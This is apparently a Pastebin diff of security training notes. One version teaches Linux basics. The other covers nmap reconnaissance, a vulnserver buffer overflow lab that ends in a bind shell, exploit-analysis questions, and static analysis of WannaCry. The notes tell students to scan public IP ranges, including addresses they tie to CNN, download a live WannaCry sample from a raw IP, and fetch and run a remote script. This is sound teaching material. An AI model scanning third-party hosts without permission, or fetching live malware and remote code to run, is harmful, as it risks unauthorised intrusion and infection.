View difference between Paste ID: <a href="/KiME6kqX">KiME6kqX</a> and <a href="/eVD9Cmjg">eVD9Cmjg</a> - Pastebin.com

View difference between Paste ID: KiME6kqX and eVD9Cmjg

SHOW: | | - or go back to the newest paste.

1		#####################################
2		# InfoSecAddicts Intro to Linux #
3		# By Joe McCray #
4		#####################################
5
6
7
8	-	##########
8	+
9	-	# VMWare #
9	+
10	-	##########
10	+
11	-	- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
11	+	# Connect to the server #
12		#########################
13	-	- http://www.vmware.com/ap/products/player.html
13	+
14		Use Putty to SSH into my Ubuntu host in order to perform the lab tasks below.
15
16	-	- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
16	+	You can download Putty from here:
17		http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
18
19	-	##########################
19	+
20	-	# Download the attack VM #
20	+	# Connect to the server #
21	-	##########################
21	+
22	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
22	+
23	-	user: infosecaddicts
23	+	Use Putty to SSH into my Ubuntu host in order to perform the lab tasks below.
24	-	pass: infosecaddicts
24	+
25		You can download Putty from here:
26	-	- Here is a good set of slides for getting started with Linux:
26	+	http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
27	-	http://www.slideshare.net/olafusimichael/linux-training-24086319
27	+
28
29		IP Address: 107.191.39.106
30		Protocol: ssh
31		Port: 22
32	-	- Log in to your Ubuntu host with the following credentials:
32	+	username: class
33	-	user: infosecaddicts
33	+	password:
34	-	pass: infosecaddicts
34	+
35
36		########################
37		# Scanning Methodology #
38	-	- I prefer to use Putty to SSH into my Ubuntu host on pentests and I'll be teaching this class in the same manner that I do pentests.
38	+
39	-	- You can download Putty from here:
39	+
40	-	- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
40	+	- Ping Sweep
41		What's alive?
42		------------
43	-	- For the purpose of this workshop 192.168.230.128 is my Ubuntu IP address so anytime you see that IP you'll know that's my Ubuntu host
43	+
44		---------------------------Type this command-----------------------------------
45		sudo nmap -sP 157.166.226.*
46
47		-------------------------------------------------------------------------------
48	-	# Basic Linux Commands #
48	+
49
50	-	cd ~
50	+
51		-if -SP yields no results try:
52	-	pwd
52	+	---------------------------Type this command-----------------------------------
53		sudo nmap -sL 157.166.226.*
54	-	whereis pwd
54	+
55		-------------------------------------------------------------------------------
56	-	which pwd
56	+
57
58	-	sudo find / -name pwd
58	+
59		-Look for hostnames:
60	-	/bin/pwd
60	+	---------------------------Type this command-----------------------------------
61		sudo nmap -sL 157.166.226.* \| grep cnn
62	-	mkdir LinuxBasics
62	+
63		-------------------------------------------------------------------------------
64	-	cd LinuxBasics
64	+
65
66	-	touch one two three
66	+
67		- Port Scan
68	-	ls -l t (without pressing the Enter key, press the Tab key twice. What happens?)
68	+	What's where?
69		------------
70	-	h (and again without pressing the Enter key, press the Tab key twice. What happens?)
70	+	---------------------------Type this command-----------------------------------
71		sudo nmap -sS 162.243.126.247
72	-	Press the 'Up arrow key' (What happens?)
72	+
73		-------------------------------------------------------------------------------
74	-	Press 'Ctrl-A' (What happens?)
74	+
75
76
77		- Bannergrab/Version Query
78	-	clear (What happens?)
78	+	What versions of software are running
79		-------------------------------------
80	-	echo one > one
80	+
81		---------------------------Type this command-----------------------------------
82	-	cat one (What happens?)
82	+	sudo nmap -sV 162.243.126.247
83
84	-	man cat (What happens?)
84	+	-------------------------------------------------------------------------------
85	-	q
85	+
86
87	-	cat two
87	+
88
89	-	cat one > two
89	+	- Vulnerability Research
90		Lookup the banner versions for public exploits
91	-	cat two
91	+	----------------------------------------------
92		https://www.exploit-db.com/search
93	-	cat one two > three
93	+	http://securityfocus.com/bid
94		https://packetstormsecurity.com/files/tags/exploit/
95	-	cat three
95	+
96
97	-	echo four >> three
97	+
98		Network Penetration Testing Process (known vulnerabilities)
99	-	cat three (What happens?)
99	+
100
101	-	wc -l three
101	+
102		1. Ping Sweep:
103	-	man wc
103	+	The purpose of this step is to identify live hosts
104	-	q
104	+
105		nmap -sP <ip-address/ip-range>
106	-	cat three \| grep four
106	+
107
108	-	cat three \| grep one
108	+	2. Port Scan
109		Identify running services. We use the running services to map the network topology.
110	-	man grep
110	+
111	-	q
111	+	nmap -sS <ip-address/ip-range>
112
113
114	-	man ps
114	+	3. Bannergrab
115	-	q
115	+	Identify the version of version of software running on each port
116
117	-	ps
117	+	nmap -sV <ip-address/ip-range>
118
119	-	ps aux
119	+
120
121	-	ps aux \| less
121	+	4. Vulnerability Research
122		Use the software version number to research and determine if it is out of date (vulnerable).
123	-	Press the 'Up arrow key' (What happens?)
123	+
124		exploit-db.com/search
125	-	Press the 'Down arrow key' (What happens?)
125	+
126	-	q
126	+
127
128	-	top
128	+
129
130
131
132	-	#########
132	+
133	-	# Files #
133	+
134	-	#########
134	+	Skill Level 1. Run the scanners
135	-	cd ~
135	+
136		Nexpose
137	-	pwd
137	+	Qualys
138		Retina
139		Nessus known vulnerabilities
140		OpenVas
141	-	cd LinuxBasics
141	+	Foundscan
142		GFI LanGuard
143	-	pwd
143	+	NCircle
144
145	-	cd ~
145	+
146		Skill Level 2. Manual vulnerability validation (known vulnerabilities)
147	-	pwd
147	+	-----------------------------------------------------------------------
148
149	-	cd LinuxBasics
149	+	windows -> systeminfo
150		Linux-> dpkg -l
151		rpm -qa
152
153	-	mkdir files
153	+
154
155	-	cp one files/
155	+
156
157	-	ls files/
157	+
158
159	-	cd files/
159	+
160		# Quick Stack Based Buffer Overflow #
161	-	cp ../two .
161	+
162
163		- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
164		http://45.63.104.73/ExploitLab.zip
165	-	cp ../three .
165	+
166
167		- Extract the ExploitLab.zip file to your Desktop
168
169	-	tar cvf files.tar *
169	+	- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
170
171		- Open a new command prompt and type:
172
173	-	gzip files.tar
173	+	---------------------------Type This-----------------------------------
174
175		nc localhost 9999
176		--------------------------------------------------------------------------
177	-	rm -rf one two three
177	+
178		- In the new command prompt window where you ran nc type:
179		HELP
180
181	-	tar -zxvf files.tar.gz
181	+	- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
182		- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
183	-	rm -rf files.tar.gz
183	+
184		- Now double-click on 1-simplefuzzer.py
185	-	sudo apt install -y zip unzip
185	+	- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
186
187	-	zip data *
187	+
188		- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
189	-	unzip -l data.zip
189	+
190		- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
191	-	unzip data.zip -d /tmp
191	+
192		- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
193	-	unzip -l data.zip
193	+
194		- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
195
196		- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
197	-	############
197	+
198	-	# VIM Demo #
198	+	- Calculate the distance to EIP by running script 3-3000chars.py
199	-	############
199	+	- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
200	-	cd ~
200	+
201	-	sudo apt install -y vim
201	+	4-count-chars-to-EIP.py
202	-	infosecaddicts
202	+	- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
203		- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
204	-	cd LinuxBasics
204	+
205		5-2006char-eip-check.py
206	-	mkdir vimlesson
206	+	- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
207
208	-	cd vimlesson
208	+	6-jmp-esp.py
209		- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
210	-	vi lesson1.sh
210	+
211		7-first-exploit
212	-	i (press "i" to get into INSERT mode and then paste in the lines below)
212	+	- In this script we actually do the stack overflow and launch a bind shell on port 4444
213
214	-	#!/bin/bash
214	+	8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
215
216	-	echo "This is my first time using vi to create a shell script"
216	+
217	-	echo " "
217	+	------------------------------
218	-	echo " "
218	+
219	-	echo " "
219	+
220	-	sleep 5
220	+
221	-	echo "Ok, now let's clear the screen"
221	+	#########################################
222	-	sleep 3
222	+	# FreeFloat FTP Server Exploit Analysis #
223		#########################################
224
225	-	---------------don't put this line in your script----------------------------
225	+
226
227	-	ESC (press the ESC key to get you out of INSERT mode)
227	+	Analyze the following exploit code:
228		https://www.exploit-db.com/exploits/15689/
229	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
229	+
230		1. What is the target platform that this exploit works against?
231		2. What is the variable name for the distance to EIP?
232	-	wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
232	+	3. What is the actual distance to EIP in bytes?
233		4. Describe what is happening in the variable ‘junk2’
234
235
236	-	vi lesson1.sh
236	+
237
238	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
238	+	Analysis of the training walk-through based on EID: 15689:
239		http://45.63.104.73/ff.zip
240	-	set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
240	+
241
242	-	wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
242	+
243
244		ff1.py
245		1. What does the sys module do? Call System Commands
246		2. What is sys.argv[1] and sys.argv[2]?
247	-	vi lesson1.sh
247	+	3. What application entry point is being attacked in this script?
248
249	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
249	+
250
251	-	set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
251	+	ff2.py
252		1. Explain what is happening in lines 18 - 20 doing.
253		2. What pattern_create.rb doing and where can I find it?
254	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
254	+	3. Why can’t I just double click the file to run this script?
255
256	-	/echo (typing "/echo" immediately after SHIFT: will search the file for the word echo).
256	+
257
258	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
258	+	ff3.py
259		1. Explain what is happening in lines 17 - to 25?
260	-	wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
260	+	2. Explain what is happening in lines 30 - to 32?
261		3. Why is everything below line 35 commented out?
262
263
264
265	-	vi lesson1.sh
265	+	ff4.py
266		1. Explain what is happening in lines 13 - to 15.
267	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
267	+	2. Explain what is happening in line 19.
268		3. What is the total length of buff?
269	-	set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
269	+
270
271
272	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
272	+	Ff5.py
273		1. Explain what is happening in line 15.
274	-	4 (typing "4" immediately after SHIFT: will take you to line number 4).
274	+	2. What is struct.pack?
275		3. How big is the shellcode in this script?
276	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
276	+
277
278	-	wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
278	+
279		ff6.py
280		1. What is the distance to EIP?
281		2. How big is the shellcode in this script?
282		3. What is the total byte length of the data being sent to this app?
283	-	vi lesson1.sh
283	+
284
285	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
285	+
286
287	-	set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
287	+	ff7.py
288		1. What is a tuple in python?
289		2. How big is the shellcode in this script?
290	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
290	+	3. Did your app crash in from this script?
291
292	-	4 (typing "4" immediately after SHIFT: will take you to line number 4).
292	+
293
294	-	dd (typing "dd" will delete the line that you are on)
294	+
295		ff8.py
296	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
296	+	1. How big is the shellcode in this script?
297		2. What is try/except in python?
298	-	wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
298	+	3. What is socket.SOCK_STREAM in Python?
299
300
301
302		ff9.py
303	-	vi lesson1.sh
303	+	1. What is going on in lines 19 and 20?
304		2. What is the length of the NOPs?
305	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
305	+	3. What is socket.SOCK_STREAM in Python?
306
307	-	set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
307	+
308
309
310	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
310	+	ff010.py
311		1. What is going on in lines 18 - 20?
312	-	4 (typing "4" immediately after SHIFT: will take you to line number 4).
312	+	2. What is going on in lines 29 - 32?
313		3. How would a stack adjustment help this script?
314	-	dd (typing "dd" will delete the line that you are on)
314	+
315
316	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
316	+	Required review videos to watch tonight:
317		----------------------------------------
318	-	syntax on (typing "syntax on" immediately after SHIFT: will turn on syntax highlighting
318	+	https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
319		Please watch videos 1-5 tonight. Vivek has a deep accent so I understand that it may be difficult but his material is very good - probably the best on the internet today.
320	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
320	+
321		Recommended (not required) videos to watch tonight:
322	-	set tabstop=5 (typing "set tabstop=5" immediately after SHIFT: will set your tabs to 5 spaces
322	+
323		For more background on Assembly I would recommend the following video series (videos 1-11):
324	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
324	+	https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
325		Again, you DO NOT have to watch these tonight but if you are really interested in the subject of exploit development I think they will be very helpful.
326	-	wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
326	+
327
328
329
330
331	-	vi .vimrc
331	+
332	-	i (press "i" to get into INSERT mode and then paste in the lines below)
332	+	Skill Level 3. Identify unknown vulnerabilities
333		-----------------------------------------------
334
335	-	set number
335	+	- App Type
336	-	syntax on
336	+	------------
337	-	set tabstop=5
337	+	Stand Alone Client Server Web App
338
339		*(vulnerserver.exe)*
340	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
340	+
341
342	-	wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
342	+	- Input TYpe
343		-------------
344		FIle logical network port Browser
345		Keyboard
346		Mouse
347
348
349	-	vi lesson1.sh
349	+
350		*(9999)*
351	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
351	+
352
353	-	echo $MYVIMRC (typing "echo $MYVIMRC" immediately after SHIFT: will display the path to your new .vimrc file
353	+	- Map & Fuzz app entry points:
354		------------------------------
355	-	[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
355	+	- Commands *(commands)*
356		- Methods
357	-	wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
357	+	- Verbs
358		- functions
359		- subroutines
360	-	###############
360	+	- controllers
361	-	# Permissions #
361	+
362	-	###############
362	+
363	-	cd ~
363	+	- Isolate the crash
364		-------------------
365	-	pwd
365	+
366
367
368		- Calculate the distance to EIP
369	-	cd LinuxBasics
369	+
370
371	-	ls -l one
371	+
372
373	-	We can determine a lot from examining the results of this command. The file "one" is owned by user "me".
373	+
374	-	Now "me" has the right to read and write this file.
374	+
375	-	The file is owned by the group "me". Members of the group "me" can also read and write this file.
375	+
376	-	Everybody else can read this file
376	+
377		# Log Analysis with Linux command-line tools #
378		##############################################
379		The following command line executables are found in the Mac as well as most Linux Distributions.
380	-	ls -l /bin/bash
380	+
381		cat – prints the content of a file in the terminal window
382		grep – searches and filters based on patterns
383	-	Here we can see:
383	+
384		sed – performs find and replace functions
385	-	The file "/bin/bash" is owned by user "root". The superuser has the right to read, write, and execute this file.
385	+
386	-	The file is owned by the group "root". Members of the group "root" can also read and execute this file. Everybody else can read and execute this file
386	+
387
388
389	-	The next command you need to know is "chmod"
389	+
390	-	rwx rwx rwx = 111 111 111
390	+
391	-	rw- rw- rw- = 110 110 110
391	+
392	-	rwx --- --- = 111 000 000
392	+
393		-----------------------------Type this-----------------------------------------
394	-	and so on...
394	+	wget http://45.63.104.73/cisco.log
395		-------------------------------------------------------------------------------
396	-	rwx = 111 in binary = 7
396	+
397	-	rw- = 110 in binary = 6
397	+
398	-	r-x = 101 in binary = 5
398	+
399	-	r-- = 100 in binary = 4
399	+	To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
400
401	-	ls -l one
401	+	-----------------------------Type this-----------------------------------------
402		cat cisco.log \| awk '{print $5}' \| tail -n 4
403	-	chmod 600 one
403	+	-------------------------------------------------------------------------------
404
405	-	ls -l one
405	+
406
407	-	sudo useradd testuser
407	+	Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
408	-	infosecaddicts
408	+
409		-----------------------------Type this-----------------------------------------
410	-	sudo passwd testuser
410	+
411		-------------------------------------------------------------------------------
412	-	testuser
412	+
413	-	testuser
413	+
414
415	-	sudo chown testuser one
415	+	While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
416	-	infosecaddicts
416	+
417		-----------------------------Type this-----------------------------------------
418	-	ls -l one
418	+
419		-------------------------------------------------------------------------------
420	-	sudo chgrp testuser one
420	+
421	-	infosecaddicts
421	+
422
423	-	ls -l one
423	+
424		Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
425	-	id
425	+
426		-----------------------------Type this-----------------------------------------
427	-	su testuser
427	+
428	-	testuser
428	+
429		cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| awk '{print $10}' \| sort \| uniq -c \| sort -rn
430
431	-	Here is a table of numbers that covers all the common settings. The ones beginning with "7" are used with programs (since they enable execution) and the rest are for other kinds of files.
431	+
432
433	-	Value Meaning
433	+
434	-	777 (rwxrwxrwx) No restrictions on permissions. Anybody may do anything. Generally not a desirable setting.
434	+	--------------------------------------------------------------------------------
435
436	-	755 (rwxr-xr-x) The file's owner may read, write, and execute the file. All others may read and execute the file. This setting is common for programs that are used by all users.
436	+
437
438	-	700 (rwx------) The file's owner may read, write, and execute the file. Nobody else has any rights. This setting is useful for programs that only the owner may use and must be kept private from others.
438	+
439
440	-	666 (rw-rw-rw-) All users may read and write the file.
440	+
441
442	-	644 (rw-r--r--) The owner may read and write a file, while all others may only read the file. A common setting for data files that everybody may read, but only the owner may change.
442	+	################
443		# The Scenario #
444	-	600 (rw-------) The owner may read and write a file. All others have no rights. A common setting for data files that the owner wants to keep private.
444	+	################
445		You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
446
447
448	-	Directory permissions
448	+	The fastest thing you can do is perform static analysis.
449	-	---------------------
449	+
450	-	The chmod command can also be used to control the access permissions for directories. In most ways, the permissions scheme for directories works the same way as they do with files. However, the execution permission is used in a different way. It provides control for access to file listing and other things. Here are some useful settings for directories:
450	+
451
452	-	Value Meaning
452	+	###################
453	-	777 (rwxrwxrwx) No restrictions on permissions.
453	+	# Static Analysis #
454	-	Anybody may list files, create new files in the directory and delete files in the directory.
454	+	###################
455	-	Generally not a good setting.
455	+
456		- After logging please open a terminal window and type the following commands:
457
458
459	-	755 (rwxr-xr-x) The directory owner has full access.
459	+	---------------------------Type This-----------------------------------
460	-	All others may list the directory, but cannot create files nor delete them.
460	+
461	-	This setting is common for directories that you wish to share with other users.
461	+
462		wget http://45.63.104.73/wannacry.zip
463
464		unzip wannacry.zip
465	-	700 (rwx------) The directory owner has full access. Nobody else has any rights. This setting is useful for directories that only the owner may use and must be kept private from others.
465	+	infected
466
467	-	######################
467	+	file wannacry.exe
468	-	# Process Management #
468	+
469	-	######################
469	+	mv wannacry.exe malware.pdf
470	-	top
470	+
471		file malware.pdf
472	-	sudo apt install -y htop
472	+
473	-	infosecaddicts
473	+	mv malware.pdf wannacry.exe
474
475	-	htop
475	+	hexdump -n 2 -C wannacry.exe
476
477	-	ps
477	+	----------------------------------------------------------------------
478
479	-	ps aux
479	+
480
481	-	ps -A
481	+	In a browser...go to: http://www.garykessler.net/library/file_sigs.html
482
483	-	ps -A \| less
483	+	*What is '4d 5a' or 'MZ'*
484
485	-	ps axjf
485	+
486
487	-	pstree
487	+
488
489	-	pgrep bash
489	+	---------------------------Type This-----------------------------------
490		objdump -x wannacry.exe
491	-	pgrep init
491	+
492		strings wannacry.exe
493	-	ps aux \| grep apache
493	+
494		strings wannacry.exe \| grep -i dll
495	-	You can list all of the signals that are possible to send with kill by typing:
495	+
496		strings wannacry.exe \| grep -i library
497	-	kill -l
497	+
498		strings wannacry.exe \| grep -i reg
499	-	sudo kill -HUP pid_of_apache
499	+
500		strings wannacry.exe \| grep -i key
501	-	The pkill command works in almost exactly the same way as kill, but it operates on a process name instead:
501	+
502		strings wannacry.exe \| grep -i rsa
503	-	pkill -9 ping
503	+
504	-	The above command is the equivalent of:
504	+	strings wannacry.exe \| grep -i open
505
506	-	kill -9 `pgrep ping`
506	+	strings wannacry.exe \| grep -i get
507
508		strings wannacry.exe \| grep -i mutex
509
510		strings wannacry.exe \| grep -i irc
511
512	-	####################
512	+	strings wannacry.exe \| grep -i join
513	-	# MD5 Hashing Demo #
513	+
514	-	####################
514	+	strings wannacry.exe \| grep -i admin
515	-	cd ~/LinuxBasics
515	+
516	-	mkdir hashdemo
516	+	strings wannacry.exe \| grep -i list
517	-	cd hashdemo
517	+	----------------------------------------------------------------------
518	-	echo test > test.txt
518	+
519	-	cat test.txt
519	+
520	-	md5sum test.txt
520	+
521	-	echo hello >> test.txt
521	+
522	-	cat test.txt
522	+
523	-	md5sum test.txt
523	+
524	-	cd ..
524	+
525		Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
526
527		Quick Google search for "wannacry ransomeware analysis"
528
529	-	#################################
529	+
530	-	# Symmetric Key Encryption Demo #
530	+	Reference
531	-	#################################
531	+	https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
532	-	cd ~/LinuxBasics
532	+
533	-	mkdir gpgdemo
533	+	- Yara Rule -
534	-	cd gpgdemo
534	+
535	-	echo test > test.txt
535	+
536	-	cat test.txt
536	+	Strings:
537	-	gpg -c test.txt
537	+	$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
538	-	password
538	+	$s2 = “Wanna Decryptor” wide ascii nocase
539	-	password
539	+	$s3 = “.wcry” wide ascii nocase
540	-	ls \| grep test
540	+	$s4 = “WANNACRY” wide ascii nocase
541	-	cat test.txt
541	+	$s5 = “WANACRY!” wide ascii nocase
542	-	cat test.txt.gpg
542	+	$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
543	-	rm -rf test.txt
543	+
544	-	ls \| grep test
544	+
545	-	gpg -o output.txt test.txt.gpg
545	+
546	-	cat output.txt
546	+
547
548
549	-	#########################################################################################################################
549	+
550	-	# Asymmetric Key Encryption Demo #
550	+
551	-	# #
551	+	Ok, let's look for the individual strings
552	-	# Configure random number generator #
552	+
553	-	# https://www.howtoforge.com/helping-the-random-number-generator-to-gain-enough-entropy-with-rng-tools-debian-lenny #
553	+
554	-	#########################################################################################################################
554	+	---------------------------Type This-----------------------------------
555		strings wannacry.exe \| grep -i ooops
556	-	sudo apt install -y rng-tools
556	+
557	-	infosecaddicts
557	+	strings wannacry.exe \| grep -i wanna
558
559	-	/etc/init.d/rng-tools start
559	+	strings wannacry.exe \| grep -i wcry
560
561	-	sudo rngd -r /dev/urandom
561	+	strings wannacry.exe \| grep -i wannacry
562	-	infosecaddicts
562	+
563		strings wannacry.exe \| grep -i wanacry **** Matches $s5, hmmm.....
564		----------------------------------------------------------------------
565	-	echo hello > file1.txt
565	+
566	-	echo goodbye > file2.txt
566	+
567	-	echo green > file3.txt
567	+
568	-	echo blue > file4.txt
568	+
569
570	-	tar czf files.tar.gz *.txt
570	+
571
572	-	gpg --gen-key
572	+
573	-	1
573	+
574	-	1024
574	+
575	-	0
575	+
576	-	y
576	+
577	-	John Doe
577	+
578	-	john@doe.com
578	+
579	-	--blank comment--
579	+
580	-	O
580	+
581	-	password
581	+	####################################
582	-	password
582	+	# Tired of GREP - let's try Python #
583		####################################
584		Decided to make my own script for this kind of stuff in the future. I
585
586	-	gpg --armor --output file-enc-pubkey.txt --export 'John Doe'
586	+	Reference1:
587		http://45.63.104.73/analyse_malware.py
588	-	cat file-enc-pubkey.txt
588	+
589		This is a really good script for the basics of static analysis
590	-	gpg --armor --output file-enc-privkey.asc --export-secret-keys 'John Doe'
590	+
591		Reference:
592	-	cat file-enc-privkey.asc
592	+	https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
593
594	-	gpg --encrypt --recipient 'John Doe' files.tar.gz
594	+
595		This is really good for showing some good signatures to add to the Python script
596	-	rm -rf files.tar.gz *.txt
596	+
597
598		Here is my own script using the signatures (started this yesterday, but still needs work):
599		https://pastebin.com/guxzCBmP
600	-	tar -zxvf files.tar.gz.gpg
600	+
601
602	-	gpg --output output.tar.gz --decrypt files.tar.gz.gpg
602	+
603	-	password
603	+	---------------------------Type This-----------------------------------
604		wget https://pastebin.com/raw/guxzCBmP
605	-	tar -zxvf output.tar.gz
605	+
606
607		mv guxzCBmP am.py
608
609
610		cat am.py \| less
611
612		python2.7 am.py wannacry.exe
613		----------------------------------------------------------------------
614	-	# Encryption using OpenSSL #
614	+
615
616	-	openssl genrsa -out private_key.pem 1024
616	+
617	-	openssl rsa -in private_key.pem -out public_key.pem -outform PEM -pubout
617	+	#####################
618		# Powershell Basics #
619		#####################
620	-	echo hello > encrypt.txt
620	+
621	-	openssl rsautl -encrypt -inkey public_key.pem -pubin -in encrypt.txt -out encrypt.dat
621	+	PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
622
623	-	cat encrypt.dat
623	+	PowerShell file extension end in .ps1 .
624
625	-	rm -rf encrypt.txt
625	+	An important note is that you cannot double click on a PowerShell script to execute it.
626
627		To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
628
629	-	openssl rsautl -decrypt -inkey private_key.pem -in encrypt.dat -out decrypt.txt
629	+	------------------------Type This------------------------------
630		cd c:\
631	-	cat decrypt.txt
631	+	dir
632		cd
633		ls
634		---------------------------------------------------------------
635
636	-	# Secure File/Folder Deletion #
636	+
637		To obtain a list of cmdlets, use the Get-Command cmdlet
638	-	sudo apt install -y secure-delete wipe
638	+	------------------------Type This------------------------------
639		Get-Command
640	-	wget https://www.sans.org/security-resources/tcpip.pdf
640	+	---------------------------------------------------------------
641
642	-	file tcpip.pdf
642	+
643		You can use the Get-Alias cmdlet to see a full list of aliased commands.
644	-	sudo srm tcpip.pdf
644	+	------------------------Type This------------------------------
645		Get-Alias
646	-	wget https://www.sans.org/security-resources/tcpip.pdf
646	+	---------------------------------------------------------------
647
648	-	shred tcpip.pdf
648	+
649		Don't worry you won't blow up your machine with Powershell
650	-	wget https://www.sans.org/security-resources/tcpip.pdf
650	+	------------------------Type This------------------------------
651		Get-Process \| stop-process Don't press [ ENTER ] What will this command do?
652	-	wipe tcpip.pdf
652	+	Get-Process \| stop-process -whatif
653		---------------------------------------------------------------
654
655		To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
656		------------------------Type This------------------------------
657		Get-Help Get-Command
658	-	#################
658	+
659	-	# IPTables Demo #
659	+	Get-Help Get-Service –online
660	-	#################
660	+
661	-	cd ~
661	+	Get-Service -Name TermService, Spooler
662
663	-	- Delete Existing Rules
663	+	Get-Service –N BITS
664	-	---------------------
664	+	---------------------------------------------------------------
665	-	sudo /sbin/iptables -F
665	+
666	-	infosecaddicts
666	+
667
668	-	(or)
668	+
669
670	-	sudo /sbin/iptables --flush
670	+	- Run cmdlet through a pie and refer to its properties as $_
671	-	infosecaddicts
671	+	------------------------Type This------------------------------
672		Get-Service \| where-object { $_.Status -eq "Running"}
673		---------------------------------------------------------------
674
675	-	- Set Default Chain Policies
675	+
676	-	--------------------------
676	+
677	-	iptables -P INPUT DROP
677	+	- PowerShell variables begin with the $ symbol. First lets create a variable
678	-	iptables -P FORWARD DROP
678	+	------------------------Type This------------------------------
679	-	iptables -P OUTPUT DROP
679	+	$serv = Get-Service –N Spooler
680		---------------------------------------------------------------
681
682		To see the value of a variable you can just call it in the terminal.
683	-	- Delete Existing Rules
683	+	------------------------Type This------------------------------
684	-	---------------------
684	+	$serv
685	-	sudo /sbin/iptables -F
685	+
686	-	infosecaddicts
686	+	$serv.gettype().fullname
687		---------------------------------------------------------------
688	-	(or)
688	+
689
690	-	sudo /sbin/iptables --flush
